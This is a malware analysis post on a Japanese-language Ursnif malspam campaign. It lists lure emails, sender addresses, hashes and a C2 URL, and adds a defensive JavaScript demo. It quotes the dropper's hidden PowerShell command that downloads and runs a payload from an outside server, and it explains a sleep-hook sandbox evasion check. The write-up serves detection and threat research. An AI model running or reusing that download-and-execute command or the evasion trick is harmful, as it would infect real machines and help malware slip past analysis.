Quick Analysis of Japanese Ursnif Malspam Campaign

Malware Delivery Method

docx attachment in email

Execution process

attached .docx opened -> embedded JavaScript (JScript, run by Windows Script Host) executes -> PowerShell is launched and connects to the internet -> payload is downloaded over HTTPS and executed

Example:

Document sent as an attachment in the following email:

Subject: =?iso-2022-jp?B?OBskQjduISI4NjJBQEE1YT1xJEckOSEjGyhC?= (ISO-2022-JP; decodes to 8月、原価請求書です。, "August, this is the cost invoice.")
From: =?iso-2022-jp?B?GyRCQTBFRBsoQiAbJEJCc0thGyhC?= <[email protected]> (ISO-2022-JP encoded Japanese personal name as the display name)
To: <[email protected]>
Original attachment name: 原価請求書です277253.docx ("This is the cost invoice" followed by a number; 原価請求書 = cost invoice)
MD5 hash: 85d09006634ab5f2138ac927997accda

Below are the unique sender email addresses observed in this Ursnif campaign delivering the malicious documents as email attachments:

[email protected]
[email protected]
[email protected]

And below are the spoofed addresses:

[email protected]
[email protected]
[email protected]

Embedded JavaScript in the docx performs the following tasks:

  • Checks for sleep short-circuiting (a sandbox trick of hooking Sleep so it returns immediately) by reading Date().getSeconds() before and after a one-second WScript.Sleep and comparing the two values. The method name is assembled from string fragments ("getS"+"ec"+"onds") so that a plain string search for getSeconds finds nothing:

piUCkfeTbuHWBQdaRl = "getS" + "ec" + "onds";            // builds the string "getSeconds" at run time
TJoMcZPXpCNhHVlsn = new Date()[piUCkfeTbuHWBQdaRl]();   // seconds value before the sleep
WScript.Sleep(1000);                                    // should block for one full second
qWBKNMtLEHISpva = new Date()[piUCkfeTbuHWBQdaRl]();     // seconds value after the sleep (compared with the first)

  • If no short-circuiting is detected, the script calls ShellExecute (lhzYcTRDtUorLVmdP is presumably a Shell.Application object; ShellExecute(file, args, dir, verb, show) is its signature) to launch cmd.exe. The "ping localhost" is a cheap delay; it is followed by a hidden PowerShell one-liner (-executionpolicy bypass, -noprofile, -windowstyle hidden) that downloads the payload over HTTPS with WebClient.DownloadFile into %APPDATA% and starts it with Start-Process. The mixed-case spelling of the cmdlets is a trivial signature-evasion trick:

lhzYcTRDtUorLVmdP.ShellExecute("cmd.eXE", "/c ping localhost & powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('https://aedwards.co/wp-includes/IXR/get.php?jgTbz','%appdata%xJr23.eXe'); sTarT-PROcess '%appdAta%xJr23.exe'", "", "open", 0);
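Both stages above can be reproduced offline from the defender's side. The following is an added example written for this page, not code from the dropper or from the original post. It re-implements the sleep short-circuit check with an injectable clock, so it also exercises the getSeconds() wrap from 59 to 0 at a minute boundary, which a naive "after minus before" comparison gets wrong, and it then parses the ShellExecute command line shown above to pull out the download URL, the drop path and the PowerShell switches a detection rule would key on. The command line is copied from the sample; the clock values and the benign command line used for comparison are constructed.

```javascript
// Added example for this page (not the dropper's own code). Runs under Node.js
// and never touches the network or Windows Script Host.

// ---- 1. Sleep short-circuit check ------------------------------------------
// The dropper records Date().getSeconds() before and after WScript.Sleep(1000).
// A sandbox that hooks Sleep to return immediately produces (almost) no
// difference. getSeconds() wraps 59 -> 0, so a plain "after - before" goes
// negative when the sleep crosses a minute boundary; the modulo handles that.
function sleepShortCircuited(secondsBefore, secondsAfter, expectedSeconds) {
  const elapsed = (secondsAfter - secondsBefore + 60) % 60;
  return elapsed < expectedSeconds;
}

// Mirrors the WSH snippet, with clock() (epoch ms) and sleepFn(ms) injected so
// the check can be driven by a simulated environment instead of the real host.
function timingCheck(clock, sleepFn, ms) {
  const prop = "getS" + "ec" + "onds";          // same string-splitting trick as the sample
  const before = new Date(clock())[prop]();
  sleepFn(ms);
  const after = new Date(clock())[prop]();
  return sleepShortCircuited(before, after, ms / 1000);
}

// Constructed environment: a fake clock whose Sleep either really advances
// time (honest host) or returns almost at once (sandbox hook).
function makeFakeHost(startMs) {
  let now = startMs;
  return {
    clock: () => now,
    honestSleep: (ms) => { now += ms; },
    patchedSleep: (_ms) => { now += 1; },
  };
}

// ---- 2. IOC extraction from the ShellExecute command line ------------------
// Second argument of the ShellExecute call shown above, copied from the sample.
const SAMPLE_CMDLINE =
  "/c ping localhost & powershell.exe -executionpolicy bypass -noprofile " +
  "-windowstyle hidden (new-object system.net.webclient).downloadfile(" +
  "'https://aedwards.co/wp-includes/IXR/get.php?jgTbz','%appdata%xJr23.eXe'); " +
  "sTarT-PROcess '%appdAta%xJr23.exe'";

// Lower-casing before matching defeats the mixed-case spelling (sTarT-PROcess).
const POWERSHELL_INDICATORS = [
  "-executionpolicy bypass", "-noprofile", "-windowstyle hidden",
  "system.net.webclient", ".downloadfile(", "start-process",
];

function triageCommandLine(cmdline) {
  const lower = cmdline.toLowerCase();
  // Pull the (remote url, local path) pair out of DownloadFile('...','...').
  const dl = /downloadfile\(\s*'([^']+)'\s*,\s*'([^']+)'\s*\)/i.exec(cmdline);
  const indicators = POWERSHELL_INDICATORS.filter((i) => lower.includes(i));
  return {
    isPowerShell: lower.includes("powershell"),
    indicators,
    downloadUrl: dl ? dl[1] : null,
    dropPath: dl ? dl[2] : null,
    // Two or more indicators on one PowerShell line is the (assumed) hunting threshold.
    suspicious: lower.includes("powershell") && indicators.length >= 2,
  };
}

// Stand-alone demo: start the fake clock at second 59 to hit the wrap-around.
const demoHost = makeFakeHost(Date.UTC(2017, 7, 14, 12, 0, 59));
console.log("honest sleep flagged? ", timingCheck(demoHost.clock, demoHost.honestSleep, 1000));
console.log("patched sleep flagged?", timingCheck(demoHost.clock, demoHost.patchedSleep, 1000));
console.log(triageCommandLine(SAMPLE_CMDLINE));
```

The modulo in sleepShortCircuited is the part worth copying into any emulator that feeds the real JScript a fake clock: if the emulated clock crosses a minute boundary during the sleep, a check that compares raw seconds can report a negative elapsed time and the sample will treat the host as a sandbox.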

 

MD5 hash of the downloaded payload:

c0b7897f69f0a68297969c709cac576d

After execution, the downloaded payload makes the following network callback (C2 check-in):

antispam.city/images/Ncd0ce3MW_2Br1/2xSMfrx83BhD9VwVpJlrz/Vcj4Y3fgOgnnRFQY/b5MMsaAEnTYFOQb/9smbf8JBZRu4uT2DPA/m3IUcDt7p/eRM513X067tKgbFbFUAP/CgywchBtV2v2M3vHdCF/Pye9qtR5e88uvj4d5msIyY/XHeVYOb9Z5pcC/GutfKuT3/w_2Bd1EzlOjZGmrVBuR7_2F/waO8u_2BBp/YC_2FNg9W/K92jQnG.jpeg

Interesting callback domain name:

antispam.city (how ironic)
Whois shows the domain was registered only recently, on 14 August 2017.

 

Ref:

https://www.virustotal.com/#/file/f05f940d70b4a90908e3f0517cf581ed9d83264548577393464f781f24882cd5/detection